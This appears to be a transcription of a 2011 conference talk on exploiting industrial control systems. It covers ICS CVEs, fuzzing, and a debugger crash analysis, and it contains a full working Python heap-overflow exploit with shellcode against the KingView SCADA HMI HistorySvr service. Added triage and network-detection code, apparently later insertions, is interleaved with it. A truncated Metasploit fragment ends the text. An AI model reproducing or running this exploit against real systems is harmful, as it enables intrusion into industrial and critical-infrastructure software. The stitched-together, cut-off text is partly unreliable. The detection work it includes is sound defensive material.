Exploiting Industrial Control Systems GridSecCon 2011

Dillon Beresford NSS Labs [email protected]

ICS Vulnerabilities
• KingView SCADA HMI (WellinControl - China), HMI software: CVE-2011-0406
• Sunway ForceControl (Sunway - China), HMI software: CNVD-2011-05348, CNVD-2011-05347
• Siemens Simatic S7 PLCs (Siemens - Germany), PLC hardware: ICSA-11-223-01

Vulnerability Classifications
• Stack or Heap Overflows (Low Hanging Fruit)
• Integer Overflow
• Memory Corruption Bugs
• Arbitrary File Upload and Execution
• Local File Format - Reading Files
• Remote Client Side - Browser Plugins
• Protocol Specific Vulnerabilities (Good Stuff!)
• Backdoors - Yes, there are exploitable backdoors in some products… (SIEMENS)

Finding 0day
• Search for downloadable software using Google or Baidu, or purchase the hardware from sellers on eBay.
• Set up a stable testing environment with plenty of virtual machines containing various operating systems and service pack levels, as exploit offsets tend to change depending on the OS and service pack.
• Install the software and assess the various attack vectors, services and running processes.
• Fuzz the application or device and wait for a crash. Then determine whether the bug is exploitable or not.

Fuzzing
• The best fuzzer is the one you design yourself.
• Fuzzers send pseudo-random input.
• Ruby, Python and Perl are useful programming languages for designing custom fuzzers.
• Metasploit has a nice variety of fuzzing modules already snapped into the framework.
• Analyze the target application's protocols and dissect packets going to and from the test machine; this helps in locating attack vectors. Look for any anomalies and leverage them.

Discovery Process
• Attach a debugger to the target process
• Send a buffer containing a bunch of junk characters over a TCP or UDP port
• Pray for a crash
• Write a proof of concept trigger
• Further analyze the crash

Locate the instructions (opcodes) that get us to our evil buffer (shellcode). Most applications contain protections such as stack cookies, SafeSEH, DEP and ASLR, so we will need to bypass all of these protections in order to build a working exploit.

Tools of the Trade
• Debuggers – IDA, WinDbg or Immunity
• Debugger scripts – !mona, !pvefindaddr, !jutsu
• Packet capturing – Wireshark
• Metasploit – open source exploit framework

Debugger scripts are very helpful as they cut down the time it would normally take to develop a working exploit from a vulnerability. Metasploit is very useful as it offers exploit mixins and various exploit development tools, and it's also in Ruby!

Debug output from an exploitable bug (KingView HistorySvr.exe)

(318.6d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=42424242 ebx=00000285 ecx=44444444 edx=00d38110 esi=00d38110 edi=003a0000
eip=77f6256f esp=0012f36c ebp=0012f584 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
ntdll!RtlAllocateHeapSlowly+0x6bd:
77f6256f 8901            mov     dword ptr [ecx],eax  ds:0023:44444444=????????
0:000> u
ntdll!RtlAllocateHeapSlowly+0x6bd:
77f6256f 8901            mov     dword ptr [ecx],eax
77f62571 894804          mov     dword ptr [eax+4],ecx
77f62574 3bc1            cmp     eax,ecx
77f62576 7534            jne     ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac)
77f62578 668b06          mov     ax,word ptr [esi]
77f6257b 663d8000        cmp     ax,80h
77f6257f 732b            jae     ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac)
77f62581 0fb7c8          movzx   ecx,ax

We have control over two pointers, one in the EAX register and the other in the ECX register. We know exactly where in our buffer the addresses in each register come from, as the register contents clearly show (42424242 => "B" and 44444444 => "D"), so we can redirect the vulnerable process to our evil code and pop a shell, giving us full control over the target machine.
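The reading of the crash above, as an added triage helper that is not part of the original deck: it parses the WinDbg register dump, reports which registers hold a dword made of a single fuzz-buffer byte, and checks whether the faulting instruction stores a tainted value through a tainted pointer, which is what a product security team wants to know when deciding how urgently a fuzzer crash needs fixing. The crash excerpt is copied from the slide; the filler alphabet "BD" is taken from the slide's buffer.

```python
import re

# Excerpt of the WinDbg output quoted on the slide (constructed test input).
CRASH_OUTPUT = """\
(318.6d4): Access violation - code c0000005 (first chance)
eax=42424242 ebx=00000285 ecx=44444444 edx=00d38110 esi=00d38110 edi=003a0000
eip=77f6256f esp=0012f36c ebp=0012f584 iopl=0 nv up ei pl zr na pe nc
ntdll!RtlAllocateHeapSlowly+0x6bd:
77f6256f 8901 mov dword ptr [ecx],eax ds:0023:44444444=????????
"""

# x86 general registers as WinDbg prints them: name=8 hex digits.
REG_RE = re.compile(r"\b(e[a-d]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})")


def parse_registers(text):
    """Return {register: int value} from the WinDbg register lines."""
    return {name: int(val, 16) for name, val in REG_RE.findall(text)}


def tainted_registers(regs, filler):
    """Registers whose value is one filler byte repeated four times,
    i.e. a dword that was copied straight out of the fuzz buffer."""
    tainted = {}
    for name, value in regs.items():
        b = value & 0xFF
        if value == b * 0x01010101 and bytes([b]) in filler:
            tainted[name] = chr(b)
    return tainted


def faulting_instruction(text):
    """Mnemonic and operands of the first 'address opcode insn' line,
    without the 'ds:' memory annotation WinDbg appends on a fault."""
    m = re.search(r"^[0-9a-f]{8} [0-9a-f]+ (.+?)(?: ds:|$)", text, re.M)
    return m.group(1) if m else None


def triage(text, filler=b"BD"):
    """Summarise controllability: which registers carry buffer bytes and
    whether the fault is a store of a tainted value through a tainted
    pointer (the write-what-where primitive the slide points out)."""
    tainted = tainted_registers(parse_registers(text), filler)
    insn = faulting_instruction(text)
    m = re.match(r"mov dword ptr \[(\w+)\],(\w+)$", insn or "")
    www = bool(m) and m.group(1) in tainted and m.group(2) in tainted
    return {"registers": tainted, "instruction": insn, "write_what_where": www}
```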

A Trigger Buffer from a PoC

exploit = ("\x90" * 1024 + "\x44" * 31788)
exploit += ("\xeb\x14")          # JMP
exploit += ("\x44" * 6)          # padding
exploit += ("\xad\xbb\xc3\x77")  # ECX 0x77C3BBAD => call dword ptr ds:[EDI+74]
exploit += ("\xb4\x73\xed\x77")  # EAX 0x77ED73B4 => UnhandledExceptionFilter()
exploit += ("\x90" * 21)
exploit += shellcode

A Working Exploit (Python 2)

import os
import socket
import sys

host = sys.argv[1]
port = int(sys.argv[2])

print " KingView 6.53 SCADA HMI Heap Smashing Exploit "
print " Credits: D1N | twitter.com/D1N "

shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"
             "\x44\x80\xc2\x77"
             "\xFF\xD1\x90\x90")

exploit = ("\x90" * 1024 + "\x44" * 31788)
exploit += ("\xeb\x14")          # our JMP (over the junk and into nops)
exploit += ("\x44" * 6)
exploit += ("\xad\xbb\xc3\x77")  # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
exploit += ("\xb4\x73\xed\x77")  # EAX 0x77ED73B4 --> UnhandledExceptionFilter()
exploit += ("\x90" * 21)
exploit += shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(exploit)
data = s.recv(1024)
print " [+] Closing connection.."
s.close()
print " [+] Done!"

# Executes a command (calc.exe) on the target machine.
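A detection-side counterpart, added here and not part of the original deck: a heuristic that flags captured payloads with the shape of this trigger (a long NOP sled followed by a very long single-byte filler run) heading for the HistorySvr listener. The listener port and the (client, port, payload) flow tuples are assumptions; the sample payloads are constructed from the sizes on the slide and carry no shellcode.

```python
# Assumption: HistorySvr listener port; set it to what your deployment uses.
HISTORYSVR_PORT = 777


def run_lengths(payload, min_run):
    """Yield (byte, length, offset) for every run of one repeated byte
    at least min_run long."""
    i = 0
    while i < len(payload):
        j = i
        while j < len(payload) and payload[j] == payload[i]:
            j += 1
        if j - i >= min_run:
            yield payload[i], j - i, i
        i = j


def looks_like_heap_smash(payload, min_sled=256, min_filler=4096):
    """True when a 0x90 sled of min_sled bytes is followed, anywhere later,
    by a non-0x90 run of min_filler bytes: the trigger layout on the slide
    (1024 NOPs, then 31788 bytes of 0x44). Normal HMI traffic never carries
    such runs, so a hit is worth an alert even without a signature."""
    runs = list(run_lengths(payload, min(min_sled, min_filler)))
    for idx, (b, n, _) in enumerate(runs):
        if b == 0x90 and n >= min_sled:
            for b2, n2, _ in runs[idx + 1:]:
                if b2 != 0x90 and n2 >= min_filler:
                    return True
    return False


def scan_flows(flows, port=HISTORYSVR_PORT):
    """flows: iterable of (client, dst_port, payload) tuples (assumed format).
    Returns one alert dict per suspicious payload toward the listener port."""
    alerts = []
    for client, dst_port, payload in flows:
        if dst_port == port and looks_like_heap_smash(payload):
            alerts.append({"client": client, "bytes": len(payload),
                           "reason": "nop sled + long filler run"})
    return alerts


# Constructed samples: the slide's sled and filler sizes, and a small benign write.
SAMPLE_TRIGGER = b"\x90" * 1024 + b"\x44" * 31788 + b"\x90" * 21
SAMPLE_BENIGN = b"\x01\x00\x10" + b"\x44" * 64
```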

Metasploit

def exploit
  sploit = ' '
  sploit